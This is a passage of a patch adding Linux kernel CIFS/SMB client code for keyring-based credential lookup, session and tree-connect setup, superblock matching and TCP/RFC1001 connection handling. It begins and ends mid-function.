++		cifs_dbg(FYI, "Bad ss_family (%hu)\n",
++			 server->dstaddr.ss_family);
++		rc = -EINVAL;
++		goto out_err;
++	}
++
++	cifs_dbg(FYI, "%s: desc=%s\n", __func__, desc);
++	key = request_key(&key_type_logon, desc, "");
++	if (IS_ERR(key)) {
++		if (!ses->domainName) {
++			cifs_dbg(FYI, "domainName is NULL\n");
++			rc = PTR_ERR(key);
++			goto out_err;
++		}
++
++		/* didn't work, try to find a domain key */
++		sprintf(desc, "cifs:d:%s", ses->domainName);
++		cifs_dbg(FYI, "%s: desc=%s\n", __func__, desc);
++		key = request_key(&key_type_logon, desc, "");
++		if (IS_ERR(key)) {
++			rc = PTR_ERR(key);
++			goto out_err;
++		}
++		is_domain = 1;
++	}
++
++	down_read(&key->sem);
++	upayload = user_key_payload_locked(key);
++	if (IS_ERR_OR_NULL(upayload)) {
++		rc = upayload ? PTR_ERR(upayload) : -EINVAL;
++		goto out_key_put;
++	}
++
++	/* find first : in payload */
++	payload = upayload->data;
++	delim = strnchr(payload, upayload->datalen, ':');
++	cifs_dbg(FYI, "payload=%s\n", payload);
++	if (!delim) {
++		cifs_dbg(FYI, "Unable to find ':' in payload (datalen=%d)\n",
++			 upayload->datalen);
++		rc = -EINVAL;
++		goto out_key_put;
++	}
++
++	len = delim - payload;
++	if (len > CIFS_MAX_USERNAME_LEN || len <= 0) {
++		cifs_dbg(FYI, "Bad value from username search (len=%zd)\n",
++			 len);
++		rc = -EINVAL;
++		goto out_key_put;
++	}
++
++	ctx->username = kstrndup(payload, len, GFP_KERNEL);
++	if (!ctx->username) {
++		cifs_dbg(FYI, "Unable to allocate %zd bytes for username\n",
++			 len);
++		rc = -ENOMEM;
++		goto out_key_put;
++	}
++	cifs_dbg(FYI, "%s: username=%s\n", __func__, ctx->username);
++
++	len = key->datalen - (len + 1);
++	if (len > CIFS_MAX_PASSWORD_LEN || len <= 0) {
++		cifs_dbg(FYI, "Bad len for password search (len=%zd)\n", len);
++		rc = -EINVAL;
++		kfree(ctx->username);
++		ctx->username = NULL;
++		goto out_key_put;
++	}
++
++	++delim;
++	ctx->password = kstrndup(delim, len, GFP_KERNEL);
++	if (!ctx->password) {
++		cifs_dbg(FYI, "Unable to allocate %zd bytes for password\n",
++			 len);
++		rc = -ENOMEM;
++		kfree(ctx->username);
++		ctx->username = NULL;
++		goto out_key_put;
++	}
++
++	/*
++	 * If we have a domain key then we must set the domainName in the
++	 * ctx for the request.
++	 */
++	if (is_domain && ses->domainName) {
++		ctx->domainname = kstrdup(ses->domainName, GFP_KERNEL);
++		if (!ctx->domainname) {
++			cifs_dbg(FYI, "Unable to allocate %zd bytes for domain\n",
++				 len);
++			rc = -ENOMEM;
++			kfree(ctx->username);
++			ctx->username = NULL;
++			kfree_sensitive(ctx->password);
++			ctx->password = NULL;
++			goto out_key_put;
++		}
++	}
++
++	strscpy(ctx->workstation_name, ses->workstation_name, sizeof(ctx->workstation_name));
++
++out_key_put:
++	up_read(&key->sem);
++	key_put(key);
++out_err:
++	kfree(desc);
++	cifs_dbg(FYI, "%s: returning %d\n", __func__, rc);
++	return rc;
++}
++#else /* ! CONFIG_KEYS */
++static inline int
++cifs_set_cifscreds(struct smb3_fs_context *ctx __attribute__((unused)),
++		   struct cifs_ses *ses __attribute__((unused)))
++{
++	return -ENOSYS;
++}
++#endif /* CONFIG_KEYS */
++
++/**
++ * cifs_get_smb_ses - get a session matching @ctx data from @server
++ * @server: server to setup the session to
++ * @ctx: superblock configuration context to use to setup the session
++ *
++ * This function assumes it is being called from cifs_mount() where we
++ * already got a server reference (server refcount +1). See
++ * cifs_get_tcon() for refcount explanations.
++ */
++struct cifs_ses *
++cifs_get_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
++{
++	int rc = 0;
++	unsigned int xid;
++	struct cifs_ses *ses;
++	struct sockaddr_in *addr = (struct sockaddr_in *)&server->dstaddr;
++	struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)&server->dstaddr;
++
++	xid = get_xid();
++
++	ses = cifs_find_smb_ses(server, ctx);
++	if (ses) {
++		cifs_dbg(FYI, "Existing smb sess found (status=%d)\n",
++			 ses->ses_status);
++
++		spin_lock(&ses->chan_lock);
++		if (cifs_chan_needs_reconnect(ses, server)) {
++			spin_unlock(&ses->chan_lock);
++			cifs_dbg(FYI, "Session needs reconnect\n");
++
++			mutex_lock(&ses->session_mutex);
++			rc = cifs_negotiate_protocol(xid, ses, server);
++			if (rc) {
++				mutex_unlock(&ses->session_mutex);
++				/* problem -- put our ses reference */
++				cifs_put_smb_ses(ses);
++				free_xid(xid);
++				return ERR_PTR(rc);
++			}
++
++			rc = cifs_setup_session(xid, ses, server,
++						ctx->local_nls);
++			if (rc) {
++				mutex_unlock(&ses->session_mutex);
++				/* problem -- put our reference */
++				cifs_put_smb_ses(ses);
++				free_xid(xid);
++				return ERR_PTR(rc);
++			}
++			mutex_unlock(&ses->session_mutex);
++
++			spin_lock(&ses->chan_lock);
++		}
++		spin_unlock(&ses->chan_lock);
++
++		/* existing SMB ses has a server reference already */
++		cifs_put_tcp_session(server, 0);
++		free_xid(xid);
++		return ses;
++	}
++
++	rc = -ENOMEM;
++
++	cifs_dbg(FYI, "Existing smb sess not found\n");
++	ses = sesInfoAlloc();
++	if (ses == NULL)
++		goto get_ses_fail;
++
++	/* new SMB session uses our server ref */
++	ses->server = server;
++	if (server->dstaddr.ss_family == AF_INET6)
++		sprintf(ses->ip_addr, "%pI6", &addr6->sin6_addr);
++	else
++		sprintf(ses->ip_addr, "%pI4", &addr->sin_addr);
++
++	if (ctx->username) {
++		ses->user_name = kstrdup(ctx->username, GFP_KERNEL);
++		if (!ses->user_name)
++			goto get_ses_fail;
++	}
++
++	/* ctx->password freed at unmount */
++	if (ctx->password) {
++		ses->password = kstrdup(ctx->password, GFP_KERNEL);
++		if (!ses->password)
++			goto get_ses_fail;
++	}
++	if (ctx->domainname) {
++		ses->domainName = kstrdup(ctx->domainname, GFP_KERNEL);
++		if (!ses->domainName)
++			goto get_ses_fail;
++	}
++
++	strscpy(ses->workstation_name, ctx->workstation_name, sizeof(ses->workstation_name));
++
++	if (ctx->domainauto)
++		ses->domainAuto = ctx->domainauto;
++	ses->cred_uid = ctx->cred_uid;
++	ses->linux_uid = ctx->linux_uid;
++
++	ses->sectype = ctx->sectype;
++	ses->sign = ctx->sign;
++
++	/* add server as first channel */
++	spin_lock(&ses->chan_lock);
++	ses->chans[0].server = server;
++	ses->chan_count = 1;
++	ses->chan_max = ctx->multichannel ? ctx->max_channels:1;
++	ses->chans_need_reconnect = 1;
++	spin_unlock(&ses->chan_lock);
++
++	mutex_lock(&ses->session_mutex);
++	rc = cifs_negotiate_protocol(xid, ses, server);
++	if (!rc)
++		rc = cifs_setup_session(xid, ses, server, ctx->local_nls);
++	mutex_unlock(&ses->session_mutex);
++
++	/* each channel uses a different signing key */
++	spin_lock(&ses->chan_lock);
++	memcpy(ses->chans[0].signkey, ses->smb3signingkey,
++	       sizeof(ses->smb3signingkey));
++	spin_unlock(&ses->chan_lock);
++
++	if (rc)
++		goto get_ses_fail;
++
++	/*
++	 * Success: put it on the list and add it as the first channel.
++	 * Note: the session becomes active soon after this, so you'll
++	 * need to lock before changing anything in the session.
++	 */
++	spin_lock(&cifs_tcp_ses_lock);
++	list_add(&ses->smb_ses_list, &server->smb_ses_list);
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	cifs_setup_ipc(ses, ctx);
++
++	free_xid(xid);
++
++	return ses;
++
++get_ses_fail:
++	sesInfoFree(ses);
++	free_xid(xid);
++	return ERR_PTR(rc);
++}
++
++/* this function must be called with tc_lock held */
++static int match_tcon(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
++{
++	if (tcon->status == TID_EXITING)
++		return 0;
++	if (strncmp(tcon->tree_name, ctx->UNC, MAX_TREE_SIZE))
++		return 0;
++	if (tcon->seal != ctx->seal)
++		return 0;
++	if (tcon->snapshot_time != ctx->snapshot_time)
++		return 0;
++	if (tcon->handle_timeout != ctx->handle_timeout)
++		return 0;
++	if (tcon->no_lease != ctx->no_lease)
++		return 0;
++	if (tcon->nodelete != ctx->nodelete)
++		return 0;
++	return 1;
++}
++
++static struct cifs_tcon *
++cifs_find_tcon(struct cifs_ses *ses, struct smb3_fs_context *ctx)
++{
++	struct cifs_tcon *tcon;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++		spin_lock(&tcon->tc_lock);
++		if (!match_tcon(tcon, ctx)) {
++			spin_unlock(&tcon->tc_lock);
++			continue;
++		}
++		++tcon->tc_count;
++		spin_unlock(&tcon->tc_lock);
++		spin_unlock(&cifs_tcp_ses_lock);
++		return tcon;
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++	return NULL;
++}
++
++void
++cifs_put_tcon(struct cifs_tcon *tcon)
++{
++	unsigned int xid;
++	struct cifs_ses *ses;
++
++	/*
++	 * IPC tcons share the lifetime of their session and are
++	 * destroyed in the session put function.
++	 */
++	if (tcon == NULL || tcon->ipc)
++		return;
++
++	ses = tcon->ses;
++	cifs_dbg(FYI, "%s: tc_count=%d\n", __func__, tcon->tc_count);
++	spin_lock(&cifs_tcp_ses_lock);
++	spin_lock(&tcon->tc_lock);
++	if (--tcon->tc_count > 0) {
++		spin_unlock(&tcon->tc_lock);
++		spin_unlock(&cifs_tcp_ses_lock);
++		return;
++	}
++
++	/* tc_count can never go negative */
++	WARN_ON(tcon->tc_count < 0);
++
++	list_del_init(&tcon->tcon_list);
++	tcon->status = TID_EXITING;
++	spin_unlock(&tcon->tc_lock);
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	/* cancel polling of interfaces */
++	cancel_delayed_work_sync(&tcon->query_interfaces);
++
++	if (tcon->use_witness) {
++		int rc;
++
++		rc = cifs_swn_unregister(tcon);
++		if (rc < 0) {
++			cifs_dbg(VFS, "%s: Failed to unregister for witness notifications: %d\n",
++					__func__, rc);
++		}
++	}
++
++	xid = get_xid();
++	if (ses->server->ops->tree_disconnect)
++		ses->server->ops->tree_disconnect(xid, tcon);
++	_free_xid(xid);
++
++	cifs_fscache_release_super_cookie(tcon);
++	tconInfoFree(tcon);
++	cifs_put_smb_ses(ses);
++}
++
++/**
++ * cifs_get_tcon - get a tcon matching @ctx data from @ses
++ * @ses: smb session to issue the request on
++ * @ctx: the superblock configuration context to use for building the new tcon
++ *
++ * - tcon refcount is the number of mount points using the tcon.
++ * - ses refcount is the number of tcon using the session.
++ *
++ * 1. This function assumes it is being called from cifs_mount() where
++ *    we already got a session reference (ses refcount +1).
++ *
++ * 2. Since we're in the context of adding a mount point, the end
++ *    result should be either:
++ *
++ * a) a new tcon already allocated with refcount=1 (1 mount point) and
++ *    its session refcount incremented (1 new tcon). This +1 was
++ *    already done in (1).
++ *
++ * b) an existing tcon with refcount+1 (add a mount point to it) and
++ *    identical ses refcount (no new tcon). Because of (1) we need to
++ *    decrement the ses refcount.
++ */
++static struct cifs_tcon *
++cifs_get_tcon(struct cifs_ses *ses, struct smb3_fs_context *ctx)
++{
++	int rc, xid;
++	struct cifs_tcon *tcon;
++
++	tcon = cifs_find_tcon(ses, ctx);
++	if (tcon) {
++		/*
++		 * tcon already has its refcount incremented, but we need to
++		 * drop the extra ses reference taken by the caller (case b)
++		 */
++		cifs_dbg(FYI, "Found match on UNC path\n");
++		cifs_put_smb_ses(ses);
++		return tcon;
++	}
++
++	if (!ses->server->ops->tree_connect) {
++		rc = -ENOSYS;
++		goto out_fail;
++	}
++
++	tcon = tconInfoAlloc();
++	if (tcon == NULL) {
++		rc = -ENOMEM;
++		goto out_fail;
++	}
++
++	if (ctx->snapshot_time) {
++		if (ses->server->vals->protocol_id == 0) {
++			cifs_dbg(VFS,
++			     "Use SMB2 or later for snapshot mount option\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		} else
++			tcon->snapshot_time = ctx->snapshot_time;
++	}
++
++	if (ctx->handle_timeout) {
++		if (ses->server->vals->protocol_id == 0) {
++			cifs_dbg(VFS,
++			     "Use SMB2.1 or later for handle timeout option\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		} else
++			tcon->handle_timeout = ctx->handle_timeout;
++	}
++
++	tcon->ses = ses;
++	if (ctx->password) {
++		tcon->password = kstrdup(ctx->password, GFP_KERNEL);
++		if (!tcon->password) {
++			rc = -ENOMEM;
++			goto out_fail;
++		}
++	}
++
++	if (ctx->seal) {
++		if (ses->server->vals->protocol_id == 0) {
++			cifs_dbg(VFS,
++				 "SMB3 or later required for encryption\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		} else if (tcon->ses->server->capabilities &
++					SMB2_GLOBAL_CAP_ENCRYPTION)
++			tcon->seal = true;
++		else {
++			cifs_dbg(VFS, "Encryption is not supported on share\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		}
++	}
++
++	if (ctx->linux_ext) {
++		if (ses->server->posix_ext_supported) {
++			tcon->posix_extensions = true;
++			pr_warn_once("SMB3.11 POSIX Extensions are experimental\n");
++		} else if ((ses->server->vals->protocol_id == SMB311_PROT_ID) ||
++		    (strcmp(ses->server->vals->version_string,
++		     SMB3ANY_VERSION_STRING) == 0) ||
++		    (strcmp(ses->server->vals->version_string,
++		     SMBDEFAULT_VERSION_STRING) == 0)) {
++			cifs_dbg(VFS, "Server does not support mounting with posix SMB3.11 extensions\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		} else {
++			cifs_dbg(VFS, "Check vers= mount option. SMB3.11 "
++				"disabled but required for POSIX extensions\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		}
++	}
++
++	xid = get_xid();
++	rc = ses->server->ops->tree_connect(xid, ses, ctx->UNC, tcon,
++					    ctx->local_nls);
++	free_xid(xid);
++	cifs_dbg(FYI, "Tcon rc = %d\n", rc);
++	if (rc)
++		goto out_fail;
++
++	tcon->use_persistent = false;
++	/* check for SMB2 or later; CIFS does not support persistent handles */
++	if (ctx->persistent) {
++		if (ses->server->vals->protocol_id == 0) {
++			cifs_dbg(VFS,
++			     "SMB3 or later required for persistent handles\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		} else if (ses->server->capabilities &
++			   SMB2_GLOBAL_CAP_PERSISTENT_HANDLES)
++			tcon->use_persistent = true;
++		else /* persistent handles requested but not supported */ {
++			cifs_dbg(VFS,
++				"Persistent handles not supported on share\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		}
++	} else if ((tcon->capabilities & SMB2_SHARE_CAP_CONTINUOUS_AVAILABILITY)
++	     && (ses->server->capabilities & SMB2_GLOBAL_CAP_PERSISTENT_HANDLES)
++	     && (ctx->nopersistent == false)) {
++		cifs_dbg(FYI, "enabling persistent handles\n");
++		tcon->use_persistent = true;
++	} else if (ctx->resilient) {
++		if (ses->server->vals->protocol_id == 0) {
++			cifs_dbg(VFS,
++			     "SMB2.1 or later required for resilient handles\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		}
++		tcon->use_resilient = true;
++	}
++
++	tcon->use_witness = false;
++	if (IS_ENABLED(CONFIG_CIFS_SWN_UPCALL) && ctx->witness) {
++		if (ses->server->vals->protocol_id >= SMB30_PROT_ID) {
++			if (tcon->capabilities & SMB2_SHARE_CAP_CLUSTER) {
++				/*
++				 * Set the witness-in-use flag first so that
++				 * registration can be retried from the echo task
++				 */
++				tcon->use_witness = true;
++				/* And try to register immediately */
++				rc = cifs_swn_register(tcon);
++				if (rc < 0) {
++					cifs_dbg(VFS, "Failed to register for witness notifications: %d\n", rc);
++					goto out_fail;
++				}
++			} else {
++				/* TODO: try to extend for non-cluster uses (eg multichannel) */
++				cifs_dbg(VFS, "witness requested on mount but no CLUSTER capability on share\n");
++				rc = -EOPNOTSUPP;
++				goto out_fail;
++			}
++		} else {
++			cifs_dbg(VFS, "SMB3 or later required for witness option\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		}
++	}
++
++	/* If the user really knows what they are doing they can override */
++	if (tcon->share_flags & SMB2_SHAREFLAG_NO_CACHING) {
++		if (ctx->cache_ro)
++			cifs_dbg(VFS, "cache=ro requested on mount but NO_CACHING flag set on share\n");
++		else if (ctx->cache_rw)
++			cifs_dbg(VFS, "cache=singleclient requested on mount but NO_CACHING flag set on share\n");
++	}
++
++	if (ctx->no_lease) {
++		if (ses->server->vals->protocol_id == 0) {
++			cifs_dbg(VFS,
++				"SMB2 or later required for nolease option\n");
++			rc = -EOPNOTSUPP;
++			goto out_fail;
++		} else
++			tcon->no_lease = ctx->no_lease;
++	}
++
++	/*
++	 * We can have only one retry value for a connection to a share, so for
++	 * resources mounted more than once to the same server share, the last
++	 * value passed in for the retry flag is used.
++	 */
++	tcon->retry = ctx->retry;
++	tcon->nocase = ctx->nocase;
++	tcon->broken_sparse_sup = ctx->no_sparse;
++	if (ses->server->capabilities & SMB2_GLOBAL_CAP_DIRECTORY_LEASING)
++		tcon->nohandlecache = ctx->nohandlecache;
++	else
++		tcon->nohandlecache = true;
++	tcon->nodelete = ctx->nodelete;
++	tcon->local_lease = ctx->local_lease;
++	INIT_LIST_HEAD(&tcon->pending_opens);
++	tcon->status = TID_GOOD;
++
++	INIT_DELAYED_WORK(&tcon->query_interfaces,
++			  smb2_query_server_interfaces);
++	if (ses->server->dialect >= SMB30_PROT_ID &&
++	    (ses->server->capabilities & SMB2_GLOBAL_CAP_MULTI_CHANNEL)) {
++		/* schedule query interfaces poll */
++		queue_delayed_work(cifsiod_wq, &tcon->query_interfaces,
++				   (SMB_INTERFACE_POLL_INTERVAL * HZ));
++	}
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_add(&tcon->tcon_list, &ses->tcon_list);
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	return tcon;
++
++out_fail:
++	tconInfoFree(tcon);
++	return ERR_PTR(rc);
++}
++
++void
++cifs_put_tlink(struct tcon_link *tlink)
++{
++	if (!tlink || IS_ERR(tlink))
++		return;
++
++	if (!atomic_dec_and_test(&tlink->tl_count) ||
++	    test_bit(TCON_LINK_IN_TREE, &tlink->tl_flags)) {
++		tlink->tl_time = jiffies;
++		return;
++	}
++
++	if (!IS_ERR(tlink_tcon(tlink)))
++		cifs_put_tcon(tlink_tcon(tlink));
++	kfree(tlink);
++	return;
++}
++
++static int
++compare_mount_options(struct super_block *sb, struct cifs_mnt_data *mnt_data)
++{
++	struct cifs_sb_info *old = CIFS_SB(sb);
++	struct cifs_sb_info *new = mnt_data->cifs_sb;
++	unsigned int oldflags = old->mnt_cifs_flags & CIFS_MOUNT_MASK;
++	unsigned int newflags = new->mnt_cifs_flags & CIFS_MOUNT_MASK;
++
++	if ((sb->s_flags & CIFS_MS_MASK) != (mnt_data->flags & CIFS_MS_MASK))
++		return 0;
++
++	if (old->mnt_cifs_serverino_autodisabled)
++		newflags &= ~CIFS_MOUNT_SERVER_INUM;
++
++	if (oldflags != newflags)
++		return 0;
++
++	/*
++	 * We want to share the sb only if we don't specify an r/wsize, or the
++	 * specified r/wsize is greater than or equal to the existing one.
++	 */
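++	/*
++	 * E.g. (illustrative numbers only): an existing sb mounted with
++	 * wsize=65536 may be shared by a new mount requesting wsize=131072,
++	 * but not by one requesting wsize=32768.
++	 */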
++	if (new->ctx->wsize && new->ctx->wsize < old->ctx->wsize)
++		return 0;
++
++	if (new->ctx->rsize && new->ctx->rsize < old->ctx->rsize)
++		return 0;
++
++	if (!uid_eq(old->ctx->linux_uid, new->ctx->linux_uid) ||
++	    !gid_eq(old->ctx->linux_gid, new->ctx->linux_gid))
++		return 0;
++
++	if (old->ctx->file_mode != new->ctx->file_mode ||
++	    old->ctx->dir_mode != new->ctx->dir_mode)
++		return 0;
++
++	if (strcmp(old->local_nls->charset, new->local_nls->charset))
++		return 0;
++
++	if (old->ctx->acregmax != new->ctx->acregmax)
++		return 0;
++	if (old->ctx->acdirmax != new->ctx->acdirmax)
++		return 0;
++	if (old->ctx->closetimeo != new->ctx->closetimeo)
++		return 0;
++
++	return 1;
++}
++
++static int
++match_prepath(struct super_block *sb, struct cifs_mnt_data *mnt_data)
++{
++	struct cifs_sb_info *old = CIFS_SB(sb);
++	struct cifs_sb_info *new = mnt_data->cifs_sb;
++	bool old_set = (old->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH) &&
++		old->prepath;
++	bool new_set = (new->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH) &&
++		new->prepath;
++
++	if (old_set && new_set && !strcmp(new->prepath, old->prepath))
++		return 1;
++	else if (!old_set && !new_set)
++		return 1;
++
++	return 0;
++}
++
++int
++cifs_match_super(struct super_block *sb, void *data)
++{
++	struct cifs_mnt_data *mnt_data = data;
++	struct smb3_fs_context *ctx;
++	struct cifs_sb_info *cifs_sb;
++	struct TCP_Server_Info *tcp_srv;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++	struct tcon_link *tlink;
++	int rc = 0;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	cifs_sb = CIFS_SB(sb);
++
++	/* We do not want to use a superblock that has been shutdown */
++	if (CIFS_MOUNT_SHUTDOWN & cifs_sb->mnt_cifs_flags) {
++		spin_unlock(&cifs_tcp_ses_lock);
++		return 0;
++	}
++
++	tlink = cifs_get_tlink(cifs_sb_master_tlink(cifs_sb));
++	if (tlink == NULL) {
++		/* cannot match the superblock if the tlink was ever null */
++		spin_unlock(&cifs_tcp_ses_lock);
++		return 0;
++	}
++	tcon = tlink_tcon(tlink);
++	ses = tcon->ses;
++	tcp_srv = ses->server;
++
++	ctx = mnt_data->ctx;
++
++	spin_lock(&tcp_srv->srv_lock);
++	spin_lock(&ses->ses_lock);
++	spin_lock(&ses->chan_lock);
++	spin_lock(&tcon->tc_lock);
++	if (!match_server(tcp_srv, ctx) ||
++	    !match_session(ses, ctx) ||
++	    !match_tcon(tcon, ctx) ||
++	    !match_prepath(sb, mnt_data)) {
++		rc = 0;
++		goto out;
++	}
++
++	rc = compare_mount_options(sb, mnt_data);
++out:
++	spin_unlock(&tcon->tc_lock);
++	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
++	spin_unlock(&tcp_srv->srv_lock);
++
++	spin_unlock(&cifs_tcp_ses_lock);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++#ifdef CONFIG_DEBUG_LOCK_ALLOC
++static struct lock_class_key cifs_key[2];
++static struct lock_class_key cifs_slock_key[2];
++
++static inline void
++cifs_reclassify_socket4(struct socket *sock)
++{
++	struct sock *sk = sock->sk;
++	BUG_ON(!sock_allow_reclassification(sk));
++	sock_lock_init_class_and_name(sk, "slock-AF_INET-CIFS",
++		&cifs_slock_key[0], "sk_lock-AF_INET-CIFS", &cifs_key[0]);
++}
++
++static inline void
++cifs_reclassify_socket6(struct socket *sock)
++{
++	struct sock *sk = sock->sk;
++	BUG_ON(!sock_allow_reclassification(sk));
++	sock_lock_init_class_and_name(sk, "slock-AF_INET6-CIFS",
++		&cifs_slock_key[1], "sk_lock-AF_INET6-CIFS", &cifs_key[1]);
++}
++#else
++static inline void
++cifs_reclassify_socket4(struct socket *sock)
++{
++}
++
++static inline void
++cifs_reclassify_socket6(struct socket *sock)
++{
++}
++#endif
++
++/* See RFC1001 section 14 on the representation of NetBIOS names */
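++/*
++ * For illustration: each source byte is split into two nibbles and each
++ * nibble is mapped onto 'A'..'P', so the byte 0x41 ('A') encodes to "EB"
++ * ('A' + 0x4, 'A' + 0x1), doubling the length of the name.
++ */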
++static void rfc1002mangle(char *target, char *source, unsigned int length)
++{
++	unsigned int i, j;
++
++	for (i = 0, j = 0; i < (length); i++) {
++		/* mask a nibble at a time and encode */
++		target[j] = 'A' + (0x0F & (source[i] >> 4));
++		target[j+1] = 'A' + (0x0F & source[i]);
++		j += 2;
++	}
++
++}
++
++static int
++bind_socket(struct TCP_Server_Info *server)
++{
++	int rc = 0;
++	if (server->srcaddr.ss_family != AF_UNSPEC) {
++		/* Bind to the specified local IP address */
++		struct socket *socket = server->ssocket;
++		rc = socket->ops->bind(socket,
++				       (struct sockaddr *) &server->srcaddr,
++				       sizeof(server->srcaddr));
++		if (rc < 0) {
++			struct sockaddr_in *saddr4;
++			struct sockaddr_in6 *saddr6;
++			saddr4 = (struct sockaddr_in *)&server->srcaddr;
++			saddr6 = (struct sockaddr_in6 *)&server->srcaddr;
++			if (saddr6->sin6_family == AF_INET6)
++				cifs_server_dbg(VFS, "Failed to bind to: %pI6c, error: %d\n",
++					 &saddr6->sin6_addr, rc);
++			else
++				cifs_server_dbg(VFS, "Failed to bind to: %pI4, error: %d\n",
++					 &saddr4->sin_addr.s_addr, rc);
++		}
++	}
++	return rc;
++}
++
++static int
++ip_rfc1001_connect(struct TCP_Server_Info *server)
++{
++	int rc = 0;
++	/*
++	 * some servers require an RFC1001 sessinit before sending
++	 * negprot - BB check reconnection for the case where a second
++	 * sessinit is sent but no second negprot
++	 */
++	struct rfc1002_session_packet req = {};
++	struct smb_hdr *smb_buf = (struct smb_hdr *)&req;
++	unsigned int len;
++
++	req.trailer.session_req.called_len = sizeof(req.trailer.session_req.called_name);
++
++	if (server->server_RFC1001_name[0] != 0)
++		rfc1002mangle(req.trailer.session_req.called_name,
++			      server->server_RFC1001_name,
++			      RFC1001_NAME_LEN_WITH_NULL);
++	else
++		rfc1002mangle(req.trailer.session_req.called_name,
++			      DEFAULT_CIFS_CALLED_NAME,
++			      RFC1001_NAME_LEN_WITH_NULL);
++
++	req.trailer.session_req.calling_len = sizeof(req.trailer.session_req.calling_name);
++
++	/* calling name ends in null (byte 16) from old smb convention */
++	if (server->workstation_RFC1001_name[0] != 0)
++		rfc1002mangle(req.trailer.session_req.calling_name,
++			      server->workstation_RFC1001_name,
++			      RFC1001_NAME_LEN_WITH_NULL);
++	else
++		rfc1002mangle(req.trailer.session_req.calling_name,
++			      "LINUX_CIFS_CLNT",
++			      RFC1001_NAME_LEN_WITH_NULL);
++
++	/*
++	 * As per RFC1002, @len must be the number of bytes that follow the
++	 * length field of an RFC1002 session request payload.
++	 */
++	len = sizeof(req) - offsetof(struct rfc1002_session_packet, trailer.session_req);
++
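++	/*
++	 * The RFC1002 header is packed into one big-endian word: the packet
++	 * type (0x81, SESSION REQUEST) occupies the top byte and the payload
++	 * length the low bytes; e.g. a 68-byte payload (illustrative value)
++	 * would go on the wire as 0x81000044.
++	 */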
++	smb_buf->smb_buf_length = cpu_to_be32((RFC1002_SESSION_REQUEST << 24) | len);
++	rc = smb_send(server, smb_buf, len);
++	/*
++	 * The RFC1001 layer in at least one server requires a very short break
++	 * before negprot, presumably because it does not expect negprot to
++	 * follow so quickly. This simple workaround avoids complicating the
++	 * code and causes no significant slowdown on mount for everyone else.
++	 */
++	usleep_range(1000, 2000);
++
++	return rc;
++}
++
++static int
++generic_ip_connect(struct TCP_Server_Info *server)
++{
++	int rc = 0;
++	__be16 sport;
++	int slen, sfamily;
++	struct socket *socket = server->ssocket;
++	struct sockaddr *saddr;
++
++	saddr = (struct sockaddr *) &server->dstaddr;
++
++	if (server->dstaddr.ss_family == AF_INET6) {
++		struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)&server->dstaddr;
++
++		sport = ipv6->sin6_port;
++		slen = sizeof(struct sockaddr_in6);
++		sfamily = AF_INET6;
++		cifs_dbg(FYI, "%s: connecting to [%pI6]:%d\n", __func__, &ipv6->sin6_addr,
++				ntohs(sport));
++	} else {
++		struct sockaddr_in *ipv4 = (struct sockaddr_in *)&server->dstaddr;
++
++		sport = ipv4->sin_port;
++		slen = sizeof(struct sockaddr_in);
++		sfamily = AF_INET;
++		cifs_dbg(FYI, "%s: connecting to %pI4:%d\n", __func__, &ipv4->sin_addr,
++				ntohs(sport));
++	}
++
++	if (socket == NULL) {
++		rc = __sock_create(cifs_net_ns(server), sfamily, SOCK_STREAM,
++				   IPPROTO_TCP, &socket, 1);
++		if (rc < 0) {
++			cifs_server_dbg(VFS, "Error %d creating socket\n", rc);
++			server->ssocket = NULL;
++			return rc;
++		}
++
++		/* BB other socket options to set KEEPALIVE, NODELAY? */
++		cifs_dbg(FYI, "Socket created\n");
++		server->ssocket = socket;
++		socket->sk->sk_allocation = GFP_NOFS;
++		if (sfamily == AF_INET6)
++			cifs_reclassify_socket6(socket);
++		else
++			cifs_reclassify_socket4(socket);
++	}
++
++	rc = bind_socket(server);
++	if (rc < 0)
++		return rc;
++
++	/*
++	 * Eventually check for other socket options to change from
++	 * the default. sock_setsockopt() is not used because it expects
++	 * a user-space buffer.
++	 */
++	socket->sk->sk_rcvtimeo = 7 * HZ;
++	socket->sk->sk_sndtimeo = 5 * HZ;
++
++	/* make the bufsizes depend on wsize/rsize and max requests */
++	if (server->noautotune) {
++		if (socket->sk->sk_sndbuf < (200 * 1024))
++			socket->sk->sk_sndbuf = 200 * 1024;
++		if (socket->sk->sk_rcvbuf < (140 * 1024))
++			socket->sk->sk_rcvbuf = 140 * 1024;
++	}
++
++	if (server->tcp_nodelay)
++		tcp_sock_set_nodelay(socket->sk);
++
++	cifs_dbg(FYI, "sndbuf %d rcvbuf %d rcvtimeo 0x%lx\n",
++		 socket->sk->sk_sndbuf,
++		 socket->sk->sk_rcvbuf, socket->sk->sk_rcvtimeo);
++
++	rc = socket->ops->connect(socket, saddr, slen,
++				  server->noblockcnt ? O_NONBLOCK : 0);
++	/*
++	 * When mounting SMB root file systems, we do not want to block in
++	 * connect. Otherwise bail out and then let cifs_reconnect() perform
++	 * reconnect failover - if possible.
++	 */
++	if (server->noblockcnt && rc == -EINPROGRESS)
++		rc = 0;
++	if (rc < 0) {
++		cifs_dbg(FYI, "Error %d connecting to server\n", rc);
